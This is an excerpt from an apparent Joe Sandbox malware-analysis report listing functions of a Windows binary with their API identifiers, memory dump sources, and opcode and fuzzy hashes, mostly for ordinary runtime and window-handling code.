                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$LongPointsRedrawShowVisible
                                                                            • String ID:
                                                                            • API String ID: 307805495-0
                                                                            • Opcode ID: 5f9874dc25956669e46d1e6e2411a80bf642c89ffb5b610104e6ae86527dd6d1
                                                                            • Instruction ID: 3fdd773392c8796f9c4cc365f7cc593d415663c7f7eede7694a51d8396b9e769
                                                                            • Opcode Fuzzy Hash: 5f9874dc25956669e46d1e6e2411a80bf642c89ffb5b610104e6ae86527dd6d1
                                                                            • Instruction Fuzzy Hash: 5D81C232B102808AFB2ACF76D184BAE77A4F74CB84F088625DF055BB65DB39D441CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401FE5AC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 195COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _get_daylight_invalid_parameter_noinfo
                                                                            • String ID: pPE
                                                                            • API String ID: 474895018-398285065
                                                                            • Opcode ID: 77fe077e6b21ec99216bf68402177326eec03bb2856be5111ed4deb33b079892
                                                                            • Instruction ID: b14b2d0d19de9f9d92f6712758aa1d7c998f89a5e04316bc47dfb17e1f0da43a
                                                                            • Opcode Fuzzy Hash: 77fe077e6b21ec99216bf68402177326eec03bb2856be5111ed4deb33b079892
                                                                            • Instruction Fuzzy Hash: 0B71083260424446FB765A2B94F07ED76C2B7B8B74F18472DDB66876F1E679C8418700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401F0068 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: try_get_function
                                                                            • String ID: GetSystemTimePreciseAsFileTime
                                                                            • API String ID: 2742660187-595813830
                                                                            • Opcode ID: 8873ad5eca559404ecd678eeaf103fffa27e8772dff67dcb77dab66e396349ef
                                                                            • Instruction ID: 39848b3527e2cd9b0635c0d5545351d19baed34d0304a68d3972d39b3f4a2bf0
                                                                            • Opcode Fuzzy Hash: 8873ad5eca559404ecd678eeaf103fffa27e8772dff67dcb77dab66e396349ef
                                                                            • Instruction Fuzzy Hash: A6E0C275A11804C1FB0B8B93F828BE12361EB8CB54F8810329F1C0B2F0DEB88985C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400927C8 Relevance: 3.5, APIs: 2, Instructions: 458COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$ClientOffset
                                                                            • String ID:
                                                                            • API String ID: 3549191583-0
                                                                            • Opcode ID: 4285ffc1e9068a221de76088a84bfb84c30b46584294f5f800361862a5cb3d59
                                                                            • Instruction ID: c8b5eb9519461ed8941753c5a466a9eb961de8310282aa52e1025421b2d3bde7
                                                                            • Opcode Fuzzy Hash: 4285ffc1e9068a221de76088a84bfb84c30b46584294f5f800361862a5cb3d59
                                                                            • Instruction Fuzzy Hash: E9226932A146818AEB56DF6AE4407ED77A0F78CBD8F194126EF4957B69DF38D840CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401EC608 Relevance: 3.2, APIs: 2, Instructions: 221COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _Wcsftime.LIBCMT ref: 00000001401EC65B
                                                                              • Part of subcall function 00000001401EBD3C: _invalid_parameter_noinfo.LIBCMT ref: 00000001401EBD67
                                                                              • Part of subcall function 00000001401ED20C: HeapAlloc.KERNEL32(?,?,?,00000001401ED289,?,?,00000000,00000001401E7153,?,?,?,00000001401EAAF9,?,?,?,00000001401EAA1D), ref: 00000001401ED24A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AllocHeapWcsftime_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 3834302206-0
                                                                            • Opcode ID: 9346c06323124304f434cc52da460baa5077440bebde79ff95cf131ec414545d
                                                                            • Instruction ID: 360b69ca7abaaee55b55b1ce90c170cc6d3d31c180eb7786e83998d0f26a1d68
                                                                            • Opcode Fuzzy Hash: 9346c06323124304f434cc52da460baa5077440bebde79ff95cf131ec414545d
                                                                            • Instruction Fuzzy Hash: 7991C272610A9082EB65DF2AD8957ED3760F78CFA8F108616EF1E977A5CF34C4528340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014013E2CC Relevance: 3.1, APIs: 2, Instructions: 67windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: IconicLongMessagePostWindow
                                                                            • String ID:
                                                                            • API String ID: 1855654840-0
                                                                            • Opcode ID: d0418eebec24f86668f7b57f629725fea581f69107f521d88e225a04700a9212
                                                                            • Instruction ID: a2cb642d2ed5c36f48456564bf7856d9bef7b4a9bc98a2b97368d76e5e234163
                                                                            • Opcode Fuzzy Hash: d0418eebec24f86668f7b57f629725fea581f69107f521d88e225a04700a9212
                                                                            • Instruction Fuzzy Hash: CD215C76654B8582FB669A67E4C53ED63A0F39DF80F080135EB4A47BE6CE39D8418640
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401741F8 Relevance: 1.8, APIs: 1, Instructions: 305COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionInflateRectThrow
                                                                            • String ID:
                                                                            • API String ID: 4003260287-0
                                                                            • Opcode ID: de002bc6536fa14dfa5562679c54093c56c45d0161d8c424ffdbbba2676edd8f
                                                                            • Instruction ID: 3453857691b098b2690530e7b07a44247739ad17d1d839b9ad4d1e5084b982cc
                                                                            • Opcode Fuzzy Hash: de002bc6536fa14dfa5562679c54093c56c45d0161d8c424ffdbbba2676edd8f
                                                                            • Instruction Fuzzy Hash: A0D1AC32204B8087EB66DF26E8447EAB3A0F389F95F144126EF9A477A5DF38D441CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014012C5C0 Relevance: 1.8, APIs: 1, Instructions: 272COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InfoParametersSystem
                                                                            • String ID:
                                                                            • API String ID: 3098949447-0
                                                                            • Opcode ID: 6bafe10ccc3a035e6d23b5f23f5aa2e7f6af6845b67889725444d98cf11fd71a
                                                                            • Instruction ID: d21f93cdf55b2c97f7b2905ca6c4edeacdbe1e6c7bbf3997cddb1f8d44f74c3f
                                                                            • Opcode Fuzzy Hash: 6bafe10ccc3a035e6d23b5f23f5aa2e7f6af6845b67889725444d98cf11fd71a
                                                                            • Instruction Fuzzy Hash: A8B16F767106808AEB29DF66D5407EE77A1F34CBD8F04952ADF6A23BA5CB34D091CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140158178 Relevance: 1.6, APIs: 1, Instructions: 144keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncState
                                                                            • String ID:
                                                                            • API String ID: 425341421-0
                                                                            • Opcode ID: 2e877d04c1fd2319082378999765290c3da959a9330e58842b8445f04d3195b8
                                                                            • Instruction ID: 53208189b471d34f5ef0a5b850f52b1f50aebdbfa338c9c9226013f36e67ba1a
                                                                            • Opcode Fuzzy Hash: 2e877d04c1fd2319082378999765290c3da959a9330e58842b8445f04d3195b8
                                                                            • Instruction Fuzzy Hash: 18512F36304A8582EE56DBA7E8543EA67A1BB8DFC0F4D8436DF09577A1DE39C501C704
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400CA6EC Relevance: 1.6, APIs: 1, Instructions: 67windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: LongMessageSendWindow
                                                                            • String ID:
                                                                            • API String ID: 3360111000-0
                                                                            • Opcode ID: 04796f97c3dab1360e65b1b1c127e2f1399356d5137b8b2a665459566ed1c3ae
                                                                            • Instruction ID: 553341f1350fe74d83c6d1f9bddf51daa8db78b3ad03cebbe774d116de51d732
                                                                            • Opcode Fuzzy Hash: 04796f97c3dab1360e65b1b1c127e2f1399356d5137b8b2a665459566ed1c3ae
                                                                            • Instruction Fuzzy Hash: 46218172B1864047F71A9B23E915BAB6751EB9EBD4F484114AF9907EA6CF3CC1024704
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400BC26C Relevance: .5, Instructions: 454COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfowcsstr
                                                                            • String ID:
                                                                            • API String ID: 1432046302-0
                                                                            • Opcode ID: 7b21953ab43f35d3be6e7d98e4df3ba5c8121ce8b912bc7a5caa5d19df165308
                                                                            • Instruction ID: 209a4f958b5191affe757b2d4ed9b0d9c74b5077bf4e5facb9b7f46909465790
                                                                            • Opcode Fuzzy Hash: 7b21953ab43f35d3be6e7d98e4df3ba5c8121ce8b912bc7a5caa5d19df165308
                                                                            • Instruction Fuzzy Hash: A9126B76B05A418AEB02EFB6D4957EC2371AB49BD8F454012EF1D53BAADF78C905C380
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401DE314 Relevance: .3, Instructions: 284COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b29b2ce91df9e511e067c2be8d758b5e258088ba578cf1e9d23a1c89574af4d5
                                                                            • Instruction ID: 11bc108f78e372776a6ee93a88586697428db6a16c7cc5b895fc42fe24efa4d4
                                                                            • Opcode Fuzzy Hash: b29b2ce91df9e511e067c2be8d758b5e258088ba578cf1e9d23a1c89574af4d5
                                                                            • Instruction Fuzzy Hash: 61A10A3B21424046FF2ABA27E4913FD26D0BF58F99F1406299B56877E1EA38E507D710
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140096610 Relevance: .2, Instructions: 185COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3925a04d23d851c893337d5182e3f8729ca67460dfd254b32382f4ecfcaa2cbe
                                                                            • Instruction ID: fe78f397917b81ae29ffc3a619f18fd3f6ecbd770ebeb91ed67fc69761143190
                                                                            • Opcode Fuzzy Hash: 3925a04d23d851c893337d5182e3f8729ca67460dfd254b32382f4ecfcaa2cbe
                                                                            • Instruction Fuzzy Hash: 0471AC3632025192FB26DB3BA950FD623A1FBDE7D4F948115AF09879E6DB31C944CB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140004430 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 45registryclipboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ClipboardFormatRegister
                                                                            • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                            • API String ID: 1228543026-2889995556
                                                                            • Opcode ID: b6a652bd3deba3e3ae948b3db4b4c4c466afa6b44aaf15769755d930f567138b
                                                                            • Instruction ID: 6e22e6cefb730a0a73a1a0b1052449a8f8bc6e059ca1a566f74f24958530b39b
                                                                            • Opcode Fuzzy Hash: b6a652bd3deba3e3ae948b3db4b4c4c466afa6b44aaf15769755d930f567138b
                                                                            • Instruction Fuzzy Hash: AE217BB9904A05A6EF029F72E85CB993771F75CB19F404816CA4E872F4EBBCC259CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401F0540 Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F055B
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F057A
                                                                              • Part of subcall function 00000001401EFA2C: GetProcAddress.KERNEL32(?,00000000,0000000100000006,00000001401EFFBE,?,?,?,00000001401F13F3,?,?,?,00000001401D8731), ref: 00000001401EFB84
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F0599
                                                                              • Part of subcall function 00000001401EFA2C: LoadLibraryExW.KERNEL32(?,00000000,0000000100000006,00000001401EFFBE,?,?,?,00000001401F13F3,?,?,?,00000001401D8731), ref: 00000001401EFACF
                                                                              • Part of subcall function 00000001401EFA2C: GetLastError.KERNEL32(?,00000000,0000000100000006,00000001401EFFBE,?,?,?,00000001401F13F3,?,?,?,00000001401D8731), ref: 00000001401EFADD
                                                                              • Part of subcall function 00000001401EFA2C: LoadLibraryExW.KERNEL32(?,00000000,0000000100000006,00000001401EFFBE,?,?,?,00000001401F13F3,?,?,?,00000001401D8731), ref: 00000001401EFB1F
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F05B8
                                                                              • Part of subcall function 00000001401EFA2C: FreeLibrary.KERNEL32(?,00000000,0000000100000006,00000001401EFFBE,?,?,?,00000001401F13F3,?,?,?,00000001401D8731), ref: 00000001401EFB58
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F05D7
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F05F6
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F0615
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F0634
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F0653
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F0672
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
